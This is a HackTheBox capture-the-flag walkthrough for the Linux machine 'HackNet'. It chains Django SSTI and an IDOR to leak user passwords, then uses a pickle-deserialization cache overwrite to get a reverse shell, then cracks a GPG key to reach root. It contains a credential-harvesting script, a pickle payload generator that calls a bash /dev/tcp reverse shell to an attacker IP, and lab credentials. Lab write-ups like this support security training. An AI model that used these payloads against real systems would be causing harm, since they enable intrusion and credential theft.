HackTheBox — Hacknet

Linux | Dificulty: Medium | Released: 13 Sep 2025

https://app.hackthebox.com/machines/HackNet

https://labs.hackthebox.com/achievement/machine/1948178/727

This machine demonstrates chaining multiple Django-specific weaknesses. The route I used: discover a Server-Side Template Injection (SSTI) in how usernames are rendered, abuse that to leak stored user records (including passwords), log in as a user, then move laterally by tampering with Django’s file-based cache (pickle deserialization) to obtain code execution as another user, and finally analyze a GPG-encrypted backup to escalate privileges.

---

Overview (attack chain)

1. Recon → identify webapp (Django) on port 80.

2. Server-side template injection (SSTI) via an unescaped profile field used inside an HTML attribute. This is used to reveal internal objects (QuerySet dump) containing plaintext credentials.

3. Use leaked credential (mikey) → SSH to obtain initial shell.

4. Identify world-writable Django file-based cache (/var/tmp/django_cache) owned by sandy:www-data.

5. Overwrite a .djcache file with a pickle payload (expiry epoch + newline + pickled object) to achieve remote code execution when Django unpickles it — becomes sandy shell.

6. Enumerate for GPG keys / backup artifacts to escalate to root.

---

Recon & enumeration

Port/service fingerprinting

nmap -A -sV -p- --min-rate 10000 -oA scan 10.10.11.85

The target is serving HTTP on port 80. Add hacknet.htb to /etc/hosts pointing at the target IP.

echo "10.10.11.85 hacknet.htb" | sudo tee -a /etc/hosts

Web fuzzing for subdomains and directories

both feroxbuster and ffuf didnt yield anything

ffuf -u http://hacknet.htb -H "Host: FUZZ.hacknet.htb" -ac -w /usr/share/seclists/Discovery/DNS/<subdomains-top1million-110000.txt & bitquark-subdomains-top100000.txt>
feroxbuster -u http://hacknet.htb -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js,json,txt,log -t 50 -e

These scans didn’t return many surprises, but visiting the site showed a Django-powered webapp (login page).

Sign-up and login as new user to access the application

Application Surface

Browsing the app exposed endpoints typical of a social-like Django app:

• /profile — user profiles

• /profile/edit — change username/profile fields

• /messages — messaging

• /contacts — contact list

• /explore — content discovery

• /search — search page

• GET /like/<POST_ID> — triggers the like

• GET /likes/<POST_ID> — returns an HTML fragment that shows who liked a post

Confirming behavior

Register a test account and update your username to a safe test string like {{ 7*7 }}. Then cause the webapp to render the fragment (e.g., like a post) and fetch the fragment:

# like action (to ensure your modified username is in likers)
curl -s -b "sessionid=SID" \
  -H "X-Requested-With: XMLHttpRequest" "http://hacknet.htb/like/1"

# fetch likers
curl -s -b "sessionid=SID" "http://hacknet.htb/likes/1" | sed -n '1,200p'

If the server evaluates {{7*7}} into 49 inside the returned HTML, you have SSTI-capable template rendering. Note: Django’s built-in template engine is safer than Jinja; SSTI usually implies an engine that permits expression evaluation (Jinja) or unsafe usage of mark_safe|safe/render_to_string/Template with untrusted data. In any case, the app is rendering unsanitized input through the template layer.

Exploitation: cause the server to expose internal objects

The app in this exercise renders user objects inside an attribute (e.g., title="..."), and the payload {{users.values}} produced a Django QuerySet dump. To exploit:

1. Set your profile username to a template payload that prints helpful object internals. Example payloads:

   • {{users.values}} — attempts to show users variable values if available

   • {{request.META}} — show request headers/environment

   • {{settings.__dict__}} — (may or may not be available depending on exposure)

2. Use the like endpoint to appear your profile the likers list, then fetch /likes/<id> to trigger rendering.

If the server outputs an object-like representation such as:

<QuerySet [{'email': 'mikey@hacknet.htb', 'username': 'mikey', 'password':'mYd4...'} , ... ]>

then you can parse those values.

Notes:

• The backdoor_bandit account did not like any public posts, Instead, pivot to the deepdive user first and you'll see deepdive's private post are being liked by backdoor_bandit.

Login as deepdive email: deepdive@hacknet.htb

pass: D33pD!v3r

like the post with {{user.values}} as your username (user your test account)

# Like the Post
GET /like/23 HTTP/1.1
Host: hacknet.htb
Cookie: csrftoken=1RvtbXXXXX; sessionid=d47x6qXXXXXXXX

# Fetch likes rendering
GET /likes/23 HTTP/1.1
Host: hacknet.htb
Cookie: csrftoken=1RvtbXXXXX; sessionid=d47x6qXXXXXXXX

the observed flaw here despite the UI restrictions of user can't see the private post, any user can still like and render the likes of private post of any user via IDOR.

Parsing the leak via automation

This script assumes you already have session cookies (replace sessionid with yours)

#!/usr/bin/env python3
import requests, re, time
from bs4 import BeautifulSoup

BASE = "http://hacknet.htb"
LOGIN_URL = f"{BASE}/login"
PROFILE_EDIT = f"{BASE}/profile/edit"
OUT = "creds_harvested.txt"

# replace with actual session credentials 
COOKIES = {"sessionid":"PUT_YOUR_SESSION_ID_HERE"}
HEADERS = {"User-Agent":"Mozilla/5.0","Referer":BASE}

CRED_RE = re.compile(r"'email'\s*:\s*'([^']+)'[,}]\s*'username'\s*:\s*'([^']+)'[,}]\s*'password'\s*:\s*'([^']+)'")

def extract_creds(html):
    soup = BeautifulSoup(html, "html.parser")
    creds = []
    for img in soup.find_all("img"):
        title = img.get("title")
        if not title: continue
        for m in CRED_RE.finditer(title):
            creds.append(m.groups())
    return creds

s = requests.Session()
s.cookies.update(COOKIES)
s.headers.update(HEADERS)

seen = set()
for pid in range(1,101):                    
    # cause like (no CSRF header required by this app's GET-based like)
    s.get(f"{BASE}/like/{pid}")
    r = s.get(f"{BASE}/likes/{pid}")
    found = extract_creds(r.text)
    for email, user, pwd in found:
        key = (email,user)
        if key not in seen:
            seen.add(key)
            with open(OUT,"a") as f:
                f.write(f"{email}:{user}:{pwd}\n")
            print(f"[+] {email}:{user}:{pwd}")
    time.sleep(0.5)
                                         

As you notice we didn't include the csrftoken on the script, as this application's flaw is the csrftoken isn't tied to the sessionid and there's no csrftoken validation despite its implementation on client-side.

Initial shell (SSH) and post-exploitation

Using harvested credentials:

ssh mikey@hacknet.htb
# password: <Redacted>

mikey@hacknet:~$ ls
user.txt

Once inside as mikey, standard reconnaissance:

sudo -l didnt yield anything

Django cache discovery & analysis

Look for common Django cache locations:

Check permissions and ownership:

ls -ld /var/tmp/django_cache

Key observation: 777 and owned by sandy:www-data → any local user can create/modify .djcache files that Django might later unpickle.

---

Crafting a pickle payload

NVD - CVE-2021-33026nvd.nist.gov

Insecure Deserialization Attack with Python PickleMedium

Payload generator:

#!/usr/bin/env python3
import pickle
import base64

class Exploit:
     def __reduce__(self):
         import os
         return (os.system, ('bash -c "bash -i >& /dev/tcp/10.10.xx.xx/3333 0>&1"',),)

payload = base64.b64encode(pickle.dumps(Exploit()))
print(payload.decode())

python3 pickle-payload.py
gASVTgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjDNiYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE0LzMzMzMgMD4mMSKUhZRSlC4=

---

Execute this on mikey's machine (replace with your pickle payload)

for i in $(ls); do rm -f $i;  echo 'gASVTgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjDNiYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE0LzMzMzMgMD4mMSKUhZRSlC4=' |base64 -d> $i; chmod 777 $i; done

1. On attacker:

nc -lvnp 3333

1. Trigger Django to load the cache (e.g., hit /explore or relevant page):

curl -s http://hacknet.htb/explore >/dev/null

or simply reloading the http://hacknet.htb/explore

15MB

Screen Recording 2025-10-03 160058.mp4

Open

If successful, the unpickle will execute and the attacker listener will receive a reverse shell as the process user (often www-data or, depending on how the app is run, the system user — in this machine it becomes sandy).

---

Privilege escalation. GPG and encrypted backups

Once you have a shell as sandy, search for private keys and backups:

# On Target machine
sandy@hacknet:/var/www/HackNet$ ls backups
backup01.sql.gpg backup02.sql.gpg backup03.sql.gpg
sandy@hacknet:/var/www/HackNet$ cat  /home/sandy/.gnupg/private-keys-v1.d/armored_key.asc
<home/sandy/.gnupg/private-keys-v1.d/armored_key.asc
-----BEGIN PGP PRIVATE KEY BLOCK-----

lQIGBGdxrxABBACuOrGzU2PoINX/6XsSWP9OZuFU67Bf6qhsjmQ5CcZ340oNlZfl
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx+
=
-----END PGP PRIVATE KEY BLOCK-----

Transfer backup02.sql.gpg and armored_key.asc to your local machiine via python server

# on your local machine
$ gpg2john armored_key.asc > gpg.hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt gpg.hash
sweetheart (Sandy)

# on your local machine
$ for f in backup*.sql.gpg; do gpg --homedir "$GNUPGHOME" --batch --yes --pinentry-mode loopback \--passphrase "sweetheart" -o "${f%.gpg}" -d "$f" done
$ grep -nEi 'MySQL root password' backup02.sql -n 
 431: ... "share the MySQL root password ...
 434: ... "Here’s the password: h4ck3rXXXXXXXXXXXXXXX" 

GET R00T

sandy@hacknet:/var/www/HackNet$ su 
Password: h4ck3rXXXXXXXXXXXXXXX
root@hacknet:~# id
uid=0(root) gid=0(root